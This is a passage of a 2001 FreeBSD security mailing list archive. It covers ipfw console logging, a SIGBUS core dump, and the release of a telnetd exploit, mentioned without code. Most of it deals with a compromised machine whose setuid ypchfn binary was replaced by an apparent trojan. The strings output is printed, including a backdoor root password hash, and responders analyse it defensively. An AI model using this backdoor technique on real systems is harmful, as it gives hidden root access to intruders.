time a rule in ipfw was met, MdOLN> the attempt would get listed on the monitor. I know everything is in MdOLN> the logs but it was convenient to have the attempts listed on the MdOLN> monitor when comming in the morning after. MdOLN> Recently, I've upgraded to 4.3 -RC2. Everything works fine but I MdOLN> don't get the attempts listed on the monitor anymore. How can I get MdOLN> them listed again? MdOLN> Thanks, MdOLN> Mario Lobo MdOLN> - MdOLN> *** Mario Lobo - mlobo@ear.com.br MdOLN> *** American School of Recife MdOLN> To Unsubscribe: send mail to majordomo@FreeBSD.org MdOLN> with "unsubscribe freebsd-security" in the body of the message I have met similiar problems upgrading from 3.3 to 4.2 some time ago. The reason is that from some point ipfw changed its log facility from kernel to security. to see ipfw messages on the console again, you should change the line in your /etc/syslog.conf file, that says what messages must go to console ( usually it is first rule in /etc/syslog.conf ). like this: <-------old line-------> *.err;kern.debug;auth.notice;mail.crit /dev/console <-------new line-------> *.err;kern.debug;auth.notice;mail.crit;security.* /dev/console Good Luck ;------------------------------------------- ; NKritsky ; SysAdmin InternetHelp.Ru ; http://www.internethelp.ru ; mailto:nkritsky@internethelp.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 7:41:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from hellfire.hexdump.org (h006097e24f05.ne.mediaone.net [66.31.17.220]) by hub.freebsd.org (Postfix) with ESMTP id 30C3437B406 for ; Tue, 24 Jul 2001 07:41:31 -0700 (PDT) (envelope-from freebsd@hexdump.org) Received: from localhost (freebsd@localhost) by hellfire.hexdump.org (8.11.3/8.11.1) with ESMTP id f6OEr1G03447 for ; Tue, 24 Jul 2001 10:53:01 -0400 (EDT) (envelope-from freebsd@hexdump.org) Date: Tue, 24 Jul 2001 10:53:01 -0400 (EDT) From: Jeff Gentry To: freebsd-security@freebsd.org Subject: Should I be concerned? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi there ... I noticed this in my /var/log/messages yesterday: Jul 23 13:03:24 hellfire /kernel: pid 279 (sh), uid 0: exited on signal 10 (core dumped) Specifically, a sh w/ uid 0 core dumping didn't sit well with me. I can't find anything in the various other logs that is at all "funny" within a few minutes of that - which is not at all out of the ordinary as there isn't much traffic on this machine. Signal 10 is a bus error, right? Are there any exploits out there currently which would generate a SIGBUS like that? Or would this be indiciative of failing hardware somehwere? Thanks, Jeff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 7:45: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id C0F9F37B403 for ; Tue, 24 Jul 2001 07:45:00 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id 24CBE13619; Tue, 24 Jul 2001 10:45:00 -0400 (EDT) Date: Tue, 24 Jul 2001 10:45:00 -0400 From: Chris Faulhaber To: Jeff Gentry Cc: freebsd-security@freebsd.org Subject: Re: Should I be concerned? Message-ID: <20010724104500.B42475@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , Jeff Gentry , freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="opJtzjQTFsWo+cga" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from freebsd@hexdump.org on Tue, Jul 24, 2001 at 10:53:01AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --opJtzjQTFsWo+cga Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jul 24, 2001 at 10:53:01AM -0400, Jeff Gentry wrote: > Hi there ... >=20 > I noticed this in my /var/log/messages yesterday: > Jul 23 13:03:24 hellfire /kernel: pid 279 (sh), uid 0: exited on signal 10 > (core dumped) >=20 > Specifically, a sh w/ uid 0 core dumping didn't sit well with me. >=20 > I can't find anything in the various other logs that is at all > "funny" within a few minutes of that - which is not at all out of the > ordinary as there isn't much traffic on this machine. >=20 > Signal 10 is a bus error, right? >=20 > Are there any exploits out there currently which would generate a SIGBUS > like that? Or would this be indiciative of failing hardware somehwere? >=20 ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:42.signal.a= sc --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --opJtzjQTFsWo+cga Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjtdiesACgkQObaG4P6BelCo6QCbBi3bja+6RmOapLPOU3duR4Xq oGEAnjaLMP/OEnuDFfc0VGNiVrsCf5pO =nv3J -----END PGP SIGNATURE----- --opJtzjQTFsWo+cga-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 7:49:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from hellfire.hexdump.org (h006097e24f05.ne.mediaone.net [66.31.17.220]) by hub.freebsd.org (Postfix) with ESMTP id 9CB7D37B405 for ; Tue, 24 Jul 2001 07:49:44 -0700 (PDT) (envelope-from freebsd@hexdump.org) Received: from localhost (freebsd@localhost) by hellfire.hexdump.org (8.11.3/8.11.1) with ESMTP id f6OF1Dc03486; Tue, 24 Jul 2001 11:01:13 -0400 (EDT) (envelope-from freebsd@hexdump.org) Date: Tue, 24 Jul 2001 11:01:13 -0400 (EDT) From: Jeff Gentry To: Chris Faulhaber Cc: freebsd-security@FreeBSD.ORG Subject: Re: Should I be concerned? In-Reply-To: <20010724104500.B42475@peitho.fxp.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:42.signal.asc Interesting ... Is it possible to get that pattern from this bug w/o it being "an exploit"? I ask because I only have one "local user" who is not me, and there is no way in hell that she is savvy enough to do this. Which means, that if there's a local user exploiting this, that I have big problems :) thanks, Jeff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 7:59:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from mirage.nlink.com.br (mirage.nlink.com.br [200.249.195.3]) by hub.freebsd.org (Postfix) with SMTP id DBEB837B407 for ; Tue, 24 Jul 2001 07:59:46 -0700 (PDT) (envelope-from Mlobo@ear.com.br) Received: (qmail 17945 invoked from network); 24 Jul 2001 14:59:59 -0000 Received: from ear.nlink.com.br (HELO ear.com.br) (200.249.196.67) by mirage.nlink.com.br with SMTP; 24 Jul 2001 14:59:59 -0000 Received: from EARMDPA01/SpoolDir by ear.com.br (Mercury 1.48); 24 Jul 01 11:55:24 GMT-3 Received: from SpoolDir by EARMDPA01 (Mercury 1.48); 24 Jul 01 11:54:01 GMT-3 From: "Mario de Oliveira Lobo Neto" Organization: American School of Recife - Brazil To: freebsd-security@FreeBSD.ORG Date: Tue, 24 Jul 2001 11:53:44 -0300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: ipfw question Reply-To: mlobo@ear.com.br Message-ID: <3B5D61D0.25946.58CBEF@localhost> X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thanks to all that replied ! Mario - *** Mario Lobo - mlobo@ear.com.br *** American School of Recife To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 9:28:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from chrome.jdl.com (chrome.jdl.com [209.39.144.2]) by hub.freebsd.org (Postfix) with ESMTP id 40B0C37B409 for ; Tue, 24 Jul 2001 09:28:01 -0700 (PDT) (envelope-from jdl@chrome.jdl.com) Received: from chrome.jdl.com (localhost [127.0.0.1]) by chrome.jdl.com (8.9.1/8.9.1) with ESMTP id LAA05639 for ; Tue, 24 Jul 2001 11:32:26 -0500 (CDT) (envelope-from jdl@chrome.jdl.com) Message-Id: <200107241632.LAA05639@chrome.jdl.com> To: security@freebsd.org Subject: Security Check Diffs Question Clarity-Index: null Threat-Level: none Software-Engineering-Dead-Seriousness: There's no excuse for unreadable code. Net-thought: If you meet the Buddha on the net, put him in your Kill file. Date: Tue, 24 Jul 2001 11:32:23 -0500 From: Jon Loeliger Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Folks, This morning, on a machine that's been up for 33 days, I suddenly saw these /etc/security diffs: setuid diffs: 20,22c20,22 < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh --- > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh 53,55c53,55 < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh --- > 8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh So, how paranoid am I here? How concerned am I? What compromised of my system just took place? Couple things to notice: - The files now take fewer 512K blocks, but their sizes are the same? - Most of the inodes staid the same. Exact same. Are these hard linked files? Should be, right? - The inode for ypchfn changed! It's no longer hard linked, right? No form of disk restructuring, fsck, defrag, etc, was initiated by me. Note that: www 181 # cmp /usr/bin/{ypchpass,ypchfn} /usr/bin/ypchpass /usr/bin/ypchfn differ: char 25, line 1 Here is a `strings /usr/bin/ypchfn`: www 182 # strings /usr/bin/ypchfn /usr/libexec/ld-elf.so.1 FreeBSD libcrypt.so.2 _DYNAMIC _init __deregister_frame_info crypt strcmp _fini _GLOBAL_OFFSET_TABLE_ __register_frame_info libc.so.4 strerror execl environ fprintf __progname __error setgid __sF execv getpwuid getpwnam atexit exit strchr execvp setuid _etext _edata __bss_start _end 8/u QR2cc.wsLFbKU root If someone didn't hack my system, I took a disk hit and lost part of that file, right? What other log files am I disecting or where else am I poking for further evidence? Am I blowing away the bogus(?) /usr/bin/ypchfn and re-making it a hard link to the others again? jdl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 9:45:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id 651DC37B401 for ; Tue, 24 Jul 2001 09:45:13 -0700 (PDT) (envelope-from gshapiro@gshapiro.net) Received: from horsey.gshapiro.net (gshapiro@localhost [127.0.0.1]) by horsey.gshapiro.net (8.12.0.Beta16/8.12.0.Beta16) with ESMTP id f6OGj9Hk017940 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Tue, 24 Jul 2001 09:45:09 -0700 (PDT) Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.0.Beta16/8.12.0.Beta16) id f6OGj96Z017937; Tue, 24 Jul 2001 09:45:09 -0700 (PDT) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15197.42516.991529.833668@horsey.gshapiro.net> Date: Tue, 24 Jul 2001 09:45:08 -0700 From: Gregory Neil Shapiro To: Jon Loeliger Cc: security@FreeBSD.ORG Subject: Re: Security Check Diffs Question In-Reply-To: <200107241632.LAA05639@chrome.jdl.com> References: <200107241632.LAA05639@chrome.jdl.com> X-Mailer: VM 6.92 under 21.5 (beta1) "anise" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org jdl> So, how paranoid am I here? How concerned am I? I would be concerned. jdl> Here is a `strings /usr/bin/ypchfn`: Much shorter than mine, and... jdl> www 182 # strings /usr/bin/ypchfn ... jdl> 8/u jdl> QR2cc.wsLFbKU jdl> root This looks like a constant password to set root to the next time it is run. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 9:47:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 4D69437B445 for ; Tue, 24 Jul 2001 09:47:12 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f6OGlBS95118 for ; Tue, 24 Jul 2001 12:47:11 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20010724124021.078d1ec0@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 24 Jul 2001 12:41:18 -0400 To: security@freebsd.org From: Mike Tancsa Subject: telnetd remote root exploit released Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org For those of you not on bugtraq, the telnetd exploit was just posted on the list. ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 9:54:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp-server2.tampabay.rr.com (smtp-server2.cfl.rr.com [65.32.2.69]) by hub.freebsd.org (Postfix) with ESMTP id 84A9437B407 for ; Tue, 24 Jul 2001 09:54:36 -0700 (PDT) (envelope-from wade@ezri.org) Received: from ezri (242687hfc133.tampabay.rr.com [24.26.87.133]) by smtp-server2.tampabay.rr.com (8.11.2/8.11.2) with SMTP id f6OGsZc18977 for ; Tue, 24 Jul 2001 12:54:35 -0400 (EDT) From: "Wade Majors" To: Subject: RE: telnetd remote root exploit released Date: Tue, 24 Jul 2001 12:54:26 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <5.1.0.14.0.20010724124021.078d1ec0@marble.sentex.ca> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2512.0001 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is the same one we are all patched against now, right? -Wade > For those of you not on bugtraq, the telnetd exploit was just > posted on the > list. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 9:56:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 5D7C737B405 for ; Tue, 24 Jul 2001 09:56:06 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f6OGu4S96254; Tue, 24 Jul 2001 12:56:04 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20010724124953.0799bb40@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 24 Jul 2001 12:50:11 -0400 To: "Wade Majors" , From: Mike Tancsa Subject: RE: telnetd remote root exploit released In-Reply-To: References: <5.1.0.14.0.20010724124021.078d1ec0@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yes, I believe so. ---Mike At 12:54 PM 7/24/01 -0400, Wade Majors wrote: >This is the same one we are all patched against now, right? > >-Wade > > > For those of you not on bugtraq, the telnetd exploit was just > > posted on the > > list. > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 10:42:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from kira.epconline.net (kira2.epconline.net [209.83.132.2]) by hub.freebsd.org (Postfix) with ESMTP id F0D2437B401 for ; Tue, 24 Jul 2001 10:42:50 -0700 (PDT) (envelope-from carock@epconline.net) Received: from therock (betterguard.epconline.net [207.206.185.193]) by kira.epconline.net (8.11.4/8.11.4) with SMTP id f6OHgoZ59245 for ; Tue, 24 Jul 2001 12:42:50 -0500 (CDT) From: "Chuck Rock" To: Subject: RE: telnetd root exploit Date: Tue, 24 Jul 2001 12:42:50 -0500 Message-ID: <002101c11468$0ed997a0$1805010a@epconline.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Importance: Normal In-Reply-To: <20010723141609.B96187@xor.obsecurity.org> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org OK, is there a how to page for installing these patches? They aren't self evident, and the search on FreeBSD.org keeps bringing up results from the commiters handbook... Maybe a related link on the security page for ahow to install SA patches or something. If it's really there, please forgive me. Thanks in advance. Chuck > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Kris Kennaway > Sent: Monday, July 23, 2001 4:16 PM > To: Chuck Rock > Cc: security@FreeBSD.ORG > Subject: Re: telnetd root exploit > > > On Mon, Jul 23, 2001 at 12:06:50PM -0500, Chuck Rock wrote: > > Until an official advisory is released, does that mean there's > no official > > patch yet? > > Correct. The patches posted here last week were incomplete; I'm still > hoping to get the advisory out later today. > > Kris > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 10:43: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.22.40]) by hub.freebsd.org (Postfix) with ESMTP id 99AC237B405 for ; Tue, 24 Jul 2001 10:43:03 -0700 (PDT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.11.3/8.11.3) with ESMTP id f6OHgrs122026; Tue, 24 Jul 2001 13:42:53 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <200107241632.LAA05639@chrome.jdl.com> References: <200107241632.LAA05639@chrome.jdl.com> Date: Tue, 24 Jul 2001 13:42:50 -0400 To: Jon Loeliger , security@FreeBSD.ORG From: Garance A Drosihn Subject: Re: Security Check Diffs Question Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11:32 AM -0500 7/24/01, Jon Loeliger wrote: >Hi Folks, > >This morning, on a machine that's been up for 33 days, >I suddenly saw these /etc/security diffs: > [...list deleted...] > >So, how paranoid am I here? How concerned am I? >What compromised of my system just took place? If I were you, I would be very concerned. I would do something to rebuild those binaries, and probably the whole system, before I let anyone change the password to any userid on the machine. -- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or gad@freebsd.org Rensselaer Polytechnic Institute or drosih@rpi.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 10:53:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.39]) by hub.freebsd.org (Postfix) with SMTP id 6EF3C37B406 for ; Tue, 24 Jul 2001 10:53:16 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 17276 invoked by uid 1000); 24 Jul 2001 17:52:28 -0000 Date: Tue, 24 Jul 2001 20:52:28 +0300 From: Peter Pentchev To: Jon Loeliger Cc: security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20010724205228.A16243@ringworld.oblivion.bg> Mail-Followup-To: Jon Loeliger , security@freebsd.org References: <200107241632.LAA05639@chrome.jdl.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200107241632.LAA05639@chrome.jdl.com>; from jdl@jdl.com on Tue, Jul 24, 2001 at 11:32:23AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 24, 2001 at 11:32:23AM -0500, Jon Loeliger wrote: > Hi Folks, > > This morning, on a machine that's been up for 33 days, > I suddenly saw these /etc/security diffs: > > setuid diffs: > 20,22c20,22 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh > --- > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh This means that there were 6 files hardlinked to inode 8047, now there are only five. One of the links was removed and probably replaced with something else, which cannot point to the same inode. > 53,55c53,55 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh > --- > > 8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh ypchfn changed its inode number, and its link count. This means that somebody performed an unlink() (delete) on ypchfn, and then created a new ypchfn with the same size, timestamp, permissions and stuff, but still a new file - and that's where the hardlink count + inum tracking of /etc/security kicked in and alerted you. > So, how paranoid am I here? How concerned am I? Very much. Probably enough to back up all the data files on the system and reinstall from scratch. > What compromised of my system just took place? Somebody obtained root privileges and installed a new file in place of ypchfn. > Couple things to notice: > > - The files now take fewer 512K blocks, > but their sizes are the same? Not fewer 512K blocks; fewer number of links to the same inode, meaning one of the links was removed. > - Most of the inodes staid the same. Exact same. > Are these hard linked files? Should be, right? Yep, all the {yp}ch{fn,pass,sh} files are hardlinks to one binary. > - The inode for ypchfn changed! > It's no longer hard linked, right? No longer hardlinked to the same inode, but a separate file. > No form of disk restructuring, fsck, defrag, etc, was initiated by me. > > Note that: > > www 181 # cmp /usr/bin/{ypchpass,ypchfn} > /usr/bin/ypchpass /usr/bin/ypchfn differ: char 25, line 1 Figures. If someone went to the trouble of creating a separate file.. > Here is a `strings /usr/bin/ypchfn`: > > www 182 # strings /usr/bin/ypchfn > /usr/libexec/ld-elf.so.1 > FreeBSD > libcrypt.so.2 > _DYNAMIC > _init > __deregister_frame_info > crypt > strcmp > _fini > _GLOBAL_OFFSET_TABLE_ > __register_frame_info > libc.so.4 > strerror > execl > environ > fprintf > __progname > __error > setgid > __sF > execv > getpwuid > getpwnam > atexit > exit > strchr > execvp > setuid > _etext > _edata > __bss_start > _end > 8/u > QR2cc.wsLFbKU > root ..and just as somebody else pointed out, the last two lines look like a 13-character DES-encrypted password hash and a username. I think that the 'new' ypchfn either replaces root's password, or asks for a password and gives a root shell if the user enters the password corresponding to that hash. > If someone didn't hack my system, I took a disk hit and lost > part of that file, right? I very much doubt the normal ypchfn would contain a password hash and a well-known username, in that order, on two consecutive lines.. > What other log files am I disecting or where else am I poking > for further evidence? > > Am I blowing away the bogus(?) /usr/bin/ypchfn and re-making > it a hard link to the others again? No, you back up all the data on your system, and reinstall it from scratch. Like, now. And keep in mind that even files without the 'executable' bit set might not qualify as data, if they are some kind of interpreted scripts (e.g. PHP3 web scripts). G'luck, Peter -- This sentence claims to be an Epimenides paradox, but it is lying. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 10:54: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 139A337B401 for ; Tue, 24 Jul 2001 10:54:06 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f6OHs1904209; Tue, 24 Jul 2001 13:54:01 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20010724134723.0840e520@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 24 Jul 2001 13:48:07 -0400 To: "Chuck Rock" , From: Mike Tancsa Subject: RE: telnetd root exploit In-Reply-To: <002101c11468$0ed997a0$1805010a@epconline.net> References: <20010723141609.B96187@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:42 PM 7/24/01 -0500, Chuck Rock wrote: >OK, is there a how to page for installing these patches? They aren't self >evident, and the search on FreeBSD.org keeps bringing up results from the >commiters handbook... There are instructions in the advisory. What part are you stuck on ? i.e. post the steps you took, and where you ran into trouble. ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 11: 6:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 75D9837B405 for ; Tue, 24 Jul 2001 11:06:10 -0700 (PDT) (envelope-from ben@FreeBSD.org) Received: from strontium.shef.vinosystems.com ([192.168.91.36] ident=root) by scientia.demon.co.uk with esmtp (Exim 3.30 #1) id 15P6ZM-0001NZ-00; Tue, 24 Jul 2001 19:06:08 +0100 Received: (from ben@localhost) by strontium.shef.vinosystems.com (8.11.4/8.11.4) id f6OI68l30404; Tue, 24 Jul 2001 19:06:08 +0100 (BST) (envelope-from ben@FreeBSD.org) X-Authentication-Warning: strontium.shef.vinosystems.com: ben set sender to ben@FreeBSD.org using -f Date: Tue, 24 Jul 2001 19:06:07 +0100 From: Ben Smithurst To: Peter Pentchev Cc: Jon Loeliger , security@freebsd.org Subject: Re: Security Check Diffs Question Message-ID: <20010724190607.F20105@strontium.shef.vinosystems.com> References: <200107241632.LAA05639@chrome.jdl.com> 